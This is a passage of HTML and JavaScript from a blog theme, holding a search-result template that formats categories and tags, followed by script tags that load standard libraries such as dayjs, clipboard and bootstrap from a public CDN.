pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
